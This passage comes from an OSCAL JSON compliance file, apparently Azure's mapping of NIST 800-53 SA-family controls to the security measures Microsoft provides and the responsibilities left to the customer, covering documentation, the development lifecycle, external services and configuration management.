statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e10ce57e-bdf9-4264-9b88-0a71f21dca98","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-5_smt.c","by-components":[{"uuid":"2ca101b2-1e13-4d45-aee5-20f603bec109","export":{"provided":[{"uuid":"2925c32b-6ac4-4a4d-9727-6e0a96c12389","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-034"}],"description":"Azure addresses attempts to obtain information system, system component, or information system service documentation when such documentation is either unavailable or nonexistent with preventive and detective measures. As a preventive measure, Azure requires only current software to be installed in the environment. The only operating system and server application software versions allowed in Online Services datacenters are approved current versions, approved legacy versions, and approved pre-release versions. In the case there is an inability to obtain needed documentation due to the age of the information system/component, the organization would track those needs via the Microsoft Operations Center (MOC). As a detective measure, the MOC maintains Troubleshooting Guides (TSGs) to address issues in the Azure environment with physical and virtual assets. These TSGs include low level design details to allow for Microsoft personnel to effectively analyze assets. The TSGs are widely available to all users of the environment; however, sensitive information (i.e. system architecture) is stored separately and requires user login/password to access. Access to the sensitive information is restricted to only MOC personnel. Documentation for externally-provided software (scanning tools) is available online at vendor websites._x000D_ _x000D_"}],"responsibilities":[{"uuid":"4fc50735-392b-4d53-8556-7df078599cbc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-034"}],"description":"The customer is responsible for documenting and taking customer-defined actions in response to attempts to obtain administrator and/or user documentation for customer-deployed resources when such documentation is not available/nonexistent.","provided-uuid":"2925c32b-6ac4-4a4d-9727-6e0a96c12389"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5e0d3a8f-b68d-416a-959e-1cb153d6aa39","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-5_smt.d","by-components":[{"uuid":"a0de51cf-f272-421c-93e4-635cb5a42c57","export":{"provided":[{"uuid":"548fc5d1-5a70-4a43-86d4-4b84fd074666","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-035"}],"description":"Azure service teams maintain, secure, manage, and store information system documentation, including documentation regarding:_x000D_ _x000D_ * Secure configuration, installation, and operation of the information system_x000D_ * Effective use and maintenance of security features/functions_x000D_ * Known vulnerabilities regarding configuration and use of administrative (i.e. privileged) functions_x000D_ _x000D_ This documentation is stored in each service team's SharePoint site and made available to service team members. The documentation is secured via SharePoint's internal security mechanisms. Information system documentation is distributed to only the appropriate groups and individuals on a need to know basis and is based on job responsibilities._x000D_ _x000D_ Documentation for externally-provided software (scanning tools) is available online at vendor websites._x000D_ _x000D_"}],"responsibilities":[{"uuid":"11329c66-816a-4348-83d7-1d71b51c148d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-035"}],"description":"The customer is responsible for protecting administrator and user documentation for customer-deployed resources.","provided-uuid":"548fc5d1-5a70-4a43-86d4-4b84fd074666"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"009694ad-8dde-4446-8633-510983046716","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-8","statements":[{"uuid":"63647249-eff4-467a-a186-a20e42e6266f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-036"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-8_smt","by-components":[{"uuid":"448cde55-2cf4-41bc-8612-375341fe2b75","export":{"provided":[{"uuid":"805178dc-b0a0-40a1-a613-df51edeae800","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-036"}],"description":"Azure has a mature Security Development Lifecycle (SDL) process that is followed for all engineering and development projects. The Microsoft SDL process includes the following phases which implement standard security and privacy engineering principles across all of Microsoft's online services: * Phase 1: Requirements - The Requirements phase of the SDL includes the project inception-when the organization considers security and privacy at a foundational level-and a cost analysis-when determining if development and support costs for improving security and privacy are consistent with business needs. This phase also includes defining security roles and responsibilities and identifying individuals with these roles and responsibilities. * Phase 2: Design - The Design phase is when the organization builds the plan for how to take the project through the rest of the SDL process-from implementation, to verification, to release. During the Design phase the organization establishes best practices to follow for this phase by way of functional and design specifications, and by performing risk analysis to identify threats and vulnerabilities in the software. TMA (Threat Model Analysis) is required to define all attack surfaces and their associated risks; all security gaps and risks and documented and analyzed. This security impact analysis results in dataflow documentation in order to identify all intended paths for information and potential attack vectors. * Phase 3: Implementation - The Implementation phase is when the organization creates the documentation and tools the customer uses to make informed decisions about how to deploy the software securely. To this end, the Implementation phase is when the organization establishes development best practices to detect and remove security and privacy issues early in the development cycle. Microsoft understands, observes, and implements the security requirements and considerations as outlined in GSA IT Security Procedural Guide 09-48, Security Language for IT Acquisition Efforts, dated September 2009 for the information system consistent with the Azure offering's requirements. * Phase 4: Verification - During the Verification phase, the organization ensures that the code meets the security and privacy tenets established in the previous phases. This is done through security and privacy testing, and a security push-which is a team-wide focus on threat model updates, code review, testing, and thorough documentation review and edit. Additionally, service teams create a Security Incident Management document as part of their SDL requirements that outlines how security-specific incidents are addressed. A public release privacy review is also completed during the Verification phase. * Phase 5: Release - The Release phase is when the organization prepares the software for consumption and prepares for what happens once the software is released. One of the core concepts in the Release phase is response planning-mapping out a plan of action, should any security or privacy vulnerabilities be discovered in the release-and this carries over to post-release, as well, in terms of response execution. To this end, a Final Security Review and privacy review is required prior to release. The SDL dashboard is used to monitor the progress of all engineering initiatives and controls the process to ensure that all steps are followed. The System Owner is responsible for ensuring that the SDL process is followed for all engineering initiatives associated with Azure."}],"responsibilities":[{"uuid":"c2ec0373-5b4d-4649-8a38-ea82fdf3f93f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-036"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for applying security and privacy engineering principles in the specification, design, development, implementation, and modification of customer-deployed resources.","provided-uuid":"805178dc-b0a0-40a1-a613-df51edeae800"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1f3d1f66-8fb2-4ea2-9d01-7de7529c7ccc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-9","statements":[{"uuid":"e423c96a-1d37-4552-bbb5-b75bcb947162","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-037"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9_smt.a","by-components":[{"uuid":"dbf6c0a1-c096-4713-936d-55b492f76122","export":{"provided":[{"uuid":"1da3138f-1dff-4617-8c39-8bff985c1c1a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-037"}],"description":"Azure is owned and operated by Microsoft; there are no external information system services involved in the delivery of Azure services. However, if Azure does utilize external information system services outside of the Azure authorization boundary, it ensures that they comply with the information security requirements. Subsequent changes are coordinated with the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required to determine if it signifies a major change; and update documentation and reauthorize as needed per direction from the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required. Additionally, Microsoft provides deliverables to the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required as part of continuous monitoring activities allowing sufficient Government oversight. Microsoft follows the standard process outlined below in the event it does utilize services outside of the Azure authorization boundary. Microsoft engages Vendor Agencies through Microsoft's third party ordering tool, which is designed for third parties (Vendor Agencies) that have signed a Master Supplier Services Agreement (MSSA) and/or have been approved by the Global Procurement Group (GPG) as an \"Approved Vendor\" in specific categories of work. GPG requires the third party to comply with all applicable Microsoft security policies and implement security procedures to prevent disclosure of Microsoft Confidential information. Microsoft includes provisions in the MSSA and any associated Statements of Work (SOW) with each vendor addressing the need to employ appropriate security controls. Additionally, vendors that handle high business impact data must be in annual compliance with the Microsoft Supplier Security and Privacy Assurance (SSPA) Program Guide."}],"responsibilities":[{"uuid":"2563aeb6-ac55-4a14-a50f-88b633bc67c6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-037"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring that external service providers comply with the customer's information security and privacy requirements and employ customer-defined security controls in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance.","provided-uuid":"1da3138f-1dff-4617-8c39-8bff985c1c1a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"28e8faf0-f7e5-412a-8895-a7a7509a7107","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-038"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9_smt.b","by-components":[{"uuid":"69196a7e-86d2-442d-8ffa-e88153e54a4b","export":{"provided":[{"uuid":"4b41fdaf-403b-4cf4-b030-1afa685613da","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-038"}],"description":"Azure signs ISAs with external information systems; ISAs define Azure oversight and roles/responsibilities. Agencies receive and review ISAs as part of their authorization decision. Government oversight is performed by this agency review of Azure ISAs and continuous monitoring, which includes reports on ISA oversight."}],"responsibilities":[{"uuid":"3939effc-c6db-4030-a37c-ebc0f5fad9e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-038"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for defining and documenting government oversight and user responsibilities and roles with regard to external system services.","provided-uuid":"4b41fdaf-403b-4cf4-b030-1afa685613da"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"44167ea2-4b8b-4110-b569-d87f071ef1d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-039"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9_smt.c","by-components":[{"uuid":"841786e0-ec81-4c64-a939-56792edc4f27","export":{"provided":[{"uuid":"11648b12-8c1d-4161-9f0b-6190b9887733","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-039"}],"description":"Azure monitoring processes, methods and techniques are applied to customer data and access control data and are documented in ISAs and executed by Azure Security."}],"responsibilities":[{"uuid":"29ba3197-2bef-4341-84bb-f62dc047b7e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-039"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for continuously monitoring external service providers through customer-defined processes, methods, and techniques.","provided-uuid":"11648b12-8c1d-4161-9f0b-6190b9887733"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"13eea70b-a2f2-4ff0-97b6-71193362a899","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-9.1","statements":[{"uuid":"230a7a3c-fb79-4acc-bfae-84b0978cd603","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9.1_smt.a","by-components":[{"uuid":"f34dc770-274a-4f76-9e0b-fa70d6026535","export":{"provided":[{"uuid":"bd88acff-fcea-4fa9-8b77-f8f464687a35","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-040"}],"description":"Azure does not consider any information security services to be outsourced as they are defined in the supplemental guidance for the requirement. If any services were to be outsourced after receiving an ATO, Azure Security would complete an assessment of risk and follow change management processes._x000D_ _x000D_"}],"responsibilities":[{"uuid":"17e33afa-08c4-4440-859b-80a6da6fbce9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-040"}],"description":"The customer is responsible for conducting a risk assessment prior to acquiring or outsourcing dedicated information security services.","provided-uuid":"bd88acff-fcea-4fa9-8b77-f8f464687a35"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7d542768-4f78-4a9d-b33d-f3814c5d79be","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9.1_smt.b","by-components":[{"uuid":"28719885-fe98-4841-af3f-52d2a0c60c7e","export":{"provided":[{"uuid":"54a7e22e-a2c1-4fde-8df6-9a02187ad0a8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-041"}],"description":"Azure ensures the acquisition or outsourcing of dedicated information security services is approved by the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators._x000D_ _x000D_"}],"responsibilities":[{"uuid":"957adcd5-0180-409a-b0dd-f04c5e369752","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-041"}],"description":"The customer is responsible for obtaining approval of acquisitions or outsourcing of dedicated information security services.","provided-uuid":"54a7e22e-a2c1-4fde-8df6-9a02187ad0a8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a2ace826-5f35-4422-8f07-72dea20dc5a4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-9.2","statements":[{"uuid":"13d784a9-89d2-4346-ac3a-079ae8dee281","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9.2_smt","by-components":[{"uuid":"b85499fa-ddb0-4957-9f69-d7407815fbff","export":{"provided":[{"uuid":"c12c8861-b21c-4ce4-9eb8-dfaf4484efa7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-042"}],"description":"As part of the process of establishing a connection to an external information system, Azure requires the system to provide information about the functions, ports, protocols and other services required for the use of such services._x000D_ _x000D_"}],"responsibilities":[{"uuid":"327655ba-3ca6-402e-a730-8b029554c03f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-042"}],"description":"The customer is responsible for requiring external service providers to identify the functions, ports, protocols, and other services required for the use of that service.","provided-uuid":"c12c8861-b21c-4ce4-9eb8-dfaf4484efa7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5a046ee6-e04c-441e-bc27-0cc6eea1a7f3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-9.5","statements":[{"uuid":"3add5036-50a1-4b89-a9f6-849e4cc788e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-9.5_smt","by-components":[{"uuid":"dcf636c4-6748-40df-ac9a-49dcaf197ac6","export":{"provided":[{"uuid":"20293eae-9bf3-4284-9efd-7c93860fb4a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-043"}],"description":"Azure restricts the location of all services and data within the accreditation boundary to Azure continental United States datacenters._x000D_ _x000D_"}],"responsibilities":[{"uuid":"ee1461e6-cf37-4eff-ad4a-5a885223b781","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-043"}],"description":"The customer is responsible for restricting the location of information processing, storage, and services.","provided-uuid":"20293eae-9bf3-4284-9efd-7c93860fb4a7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bc1b0b09-e5ce-469a-9b45-33f4550c8552","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-10","statements":[{"uuid":"9fd37b9a-70f9-4020-8a8c-7850edd1225d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-044"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-10_smt.a","by-components":[{"uuid":"b6bd8466-47b8-4c81-b302-44422a6e15b6","export":{"provided":[{"uuid":"775c9924-54c0-48f6-8f2c-c3007a3967cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-044"}],"description":"All Azure software developers are required to follow the Azure Configuration Management Plan (CMP) and Microsoft's Security Development Lifecycle (SDL) during information system design, development, implementation, operation, and disposal."}],"responsibilities":[{"uuid":"b14bbcea-a742-4ba1-9b85-4335f1486e06","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-044"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to perform configuration management during the design, development, implementation, operation, and disposal of the resources provided.","provided-uuid":"775c9924-54c0-48f6-8f2c-c3007a3967cd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a9d3e68a-ab79-4ef5-8b06-c710083bfd4a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-045"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-10_smt.b","by-components":[{"uuid":"0ba35f32-b702-4c72-80ee-fae0e8374f59","export":{"provided":[{"uuid":"b28ad258-1ec8-4256-b53d-4a28ccb63484","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-045"}],"description":"Azure developers leverage Git or Azure DevOps to document, manage and control the integrity of changes in the development environment. These tools provide technical enforcement of documented change management processes and the SDL. Among other features, they prevent changes to configuration items that are not tied to an approved change request."}],"responsibilities":[{"uuid":"7a6fdea2-e784-40a8-8e89-d9184b7e44d5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-045"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to document, manage, and control the integrity of changes to customer-defined configuration items.","provided-uuid":"b28ad258-1ec8-4256-b53d-4a28ccb63484"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"424bbbcd-7384-4b7a-8f91-a1a48b79c7ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-046"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-10_smt.c","by-components":[{"uuid":"9f06ef8e-abe9-4bb7-9ab9-4a1af32552f1","export":{"provided":[{"uuid":"f543e6e0-6351-44a6-92cb-a84622ddbdf3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-046"}],"description":"Developers of Azure implement only approved changes to the system. The service teams follow the configuration management processes when implementing changes. Changes are approved through Git or Azure DevOps."}],"responsibilities":[{"uuid":"39698a89-21a7-451d-ad96-fb33cd395b5f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-046"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to utilize configuration management such that the developer implements only organization-approved changes to the resources provided.","provided-uuid":"f543e6e0-6351-44a6-92cb-a84622ddbdf3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3e8d3d49-066a-4f9b-9429-479a43651671","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-047"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-10_smt.d","by-components":[{"uuid":"6c7784fa-9a78-4f0f-9a95-dca46bea3966","export":{"provided":[{"uuid":"325960b8-7335-4502-a918-593e18bcb15c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-047"}],"description":"The service team tracks all approved changes in Git or Azure DevOps. The software build services of GIT and Azure DevOps have configurations in place to ensure the approval of changes by at least one other reviewer other than the individual who developed the change prior to deployment into the Azure production environment. In addition, proper testing is conducted for the changes prior to being deployed to production. As part of these change management processes, other documentation such as the SSP or user and administrative documentation is updated if applicable."}],"responsibilities":[{"uuid":"e2fa304b-68d7-4ab1-84e4-0a608d058873","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-047"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to utilize configuration management and to document approved changes and the potential security and privacy impacts of such changes.","provided-uuid":"325960b8-7335-4502-a918-593e18bcb15c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"45ad0b86-0a50-4d45-ac69-3e91f8a700e8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-048"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-10_smt.e","by-components":[{"uuid":"b35277b0-0f5e-4429-a3b7-3ad83853a7fe","export":{"provided":[{"uuid":"c57d355f-e28a-4681-85ea-35ec16b8c4b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-048"}],"description":"Azure service team developers track security flaws and flaw resolution during the development process using Azure DevOps. Any identified flaws, whether discovered by a human or by the automated tools, have a corresponding bug opened in Azure DevOps. The resolution of the flaw is then documented and tracked using the bug. A summary of identified flaws and their resolution is provided to service team management, Azure Security, and authorizing officials."}],"responsibilities":[{"uuid":"07c7adf8-0f33-477c-8668-cf222a1d7857","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-048"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to utilize configuration management, including tracking security flaws through resolution and reporting findings to customer-defined personnel.","provided-uuid":"c57d355f-e28a-4681-85ea-35ec16b8c4b5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d34eff7d-3f09-450e-87b0-b15c5dad1ea7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-11","statements":[{"uuid":"1ea6abc1-48cf-4f3d-8d15-09471f247382","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-049"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11_smt.a","by-components":[{"uuid":"dfa6df0a-a4da-421c-98ec-972f016fc329","export":{"provided":[{"uuid":"a2d65b3a-aa56-47a1-aa23-08a409401769","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-049"}],"description":"Azure develops security and privacy control assessment plans in accordance with Microsoft's Security Development Lifecycle (SDL) process. Security testing occurs during the following phases of the process: * Phase 3 - Implementation * Phase 4 - Verification * Phase 5 - Release"}],"responsibilities":[{"uuid":"426d9473-0493-4942-a9bc-702cb898ffcc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-049"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to develop and implement a plan for ongoing security and privacy control assessments.","provided-uuid":"a2d65b3a-aa56-47a1-aa23-08a409401769"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b803d87a-f32c-4e1d-922e-7174f1ad7475","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-050"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-11_smt.b","by-components":[{"uuid":"c93a2d8d-f1e7-4d78-b18b-e599bfe781d6","export":{"provided":[{"uuid":"1d468df9-808e-4bc4-9437-396ee42ffc24","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-050"}],"description":"Azure develops security assessment plans in accordance with Microsoft's Security Development Lifecycle (SDL) process."}],"responsibilities":[{"uuid":"412c9c3f-e62d-4c5c-a3df-c6a1711cf975","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-050"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for requiring the developer of customer-deployed resources to perform unit, integration, system, and/or regression testing/evaluation at the customer-defined depth and 